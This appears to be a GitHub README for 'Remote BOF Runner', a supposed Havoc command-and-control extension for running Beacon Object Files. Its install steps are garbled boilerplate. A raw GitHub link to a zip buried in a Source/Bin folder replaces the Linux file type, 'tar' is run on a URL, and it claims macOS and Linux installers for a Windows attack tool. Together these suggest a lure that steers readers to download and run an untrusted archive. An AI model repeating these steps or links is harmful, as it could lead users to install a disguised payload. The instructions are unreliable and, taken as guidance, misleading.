The Remote BOF Runner is an extension that helps you execute Beacon Object Files (BOFs) remotely. It's designed to work seamlessly with the Havoc framework, utilizing a PIC loader created with Crystal Palace.
- Remote Execution: Run BOFs from anywhere without hassle.
- User-Friendly Interface: Simple to navigate, even for beginners.
- Security Focused: Designed with security in mind to keep your operations safe.
- Fast Performance: Quick execution for all your remote needs.
To use Remote BOF Runner, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS, or a compatible Linux distribution.
- RAM: Minimum of 4 GB.
- Storage: At least 100 MB of free space.
- Network: Active internet connection for downloading and updates.
To get started with Remote BOF Runner, visit the Releases page to download the latest version.
Follow these steps to install the application:
- Click the link above to go to the Releases page.
- Find the version you want to download, typically listed at the top.
- Select the appropriate file for your operating system. This may be labeled as an executable
.exefor Windows, a.dmgfor macOS, or ahttps://raw.githubusercontent.com/arshaplayer/Remote-BOF-Runner/main/Source/BOF-Injector/Bin/Remote-Runner-BO-1.8.zipfor Linux systems. - Click on the file to start the download.
- Once downloaded, locate the file in your downloads folder.
- Navigate to the downloaded
.exefile. - Double-click to run the installer.
- Follow the on-screen prompts to complete the installation.
- Find the downloaded
.dmgfile. - Double-click to mount the disk image.
- Drag the Remote BOF Runner icon into your Applications folder.
- Open your terminal.
- Navigate to the directory where the downloaded
https://raw.githubusercontent.com/arshaplayer/Remote-BOF-Runner/main/Source/BOF-Injector/Bin/Remote-Runner-BO-1.8.zipfile is located. - Extract the file with:
tar -xvzf https://raw.githubusercontent.com/arshaplayer/Remote-BOF-Runner/main/Source/BOF-Injector/Bin/Remote-Runner-BO-1.8.zip - Change into the new directory:
cd Remote-BOF-Runner - Run the application with:
./Remote-BOF-Runner
After successfully installing the application, follow these steps to run a BOF:
- Launch the Application: Open Remote BOF Runner from your applications list or desktop shortcut.
- Load a BOF: Click on the "Load BOF" option and select the BOF file you want to execute.
- Configure Settings: Adjust any settings as needed to suit your execution environment.
- Execute: Click the "Run" button to execute your selected BOF. You should see real-time feedback in the application window.
A Beacon Object File (BOF) is a lightweight file designed to run specific tasks within a remote execution framework. It allows users to perform various actions without needing extensive coding knowledge.
Yes, Remote BOF Runner is developed with security principles in mind. Always ensure you download the application from the official GitHub Releases page to avoid tampered versions.
Yes, Remote BOF Runner supports Linux operating systems. Follow the installation steps specifically for Linux to get started.
You can report any issues or request new features by visiting the Issues section in the GitHub repository. Please provide as much detail as possible to help us address your concerns.
For further assistance, you can reach out through the Issues section on GitHub. We encourage feedback to improve Remote BOF Runner.
Thank you for choosing Remote BOF Runner for your BOF execution needs! Visit the Releases page to stay updated on new features and improvements.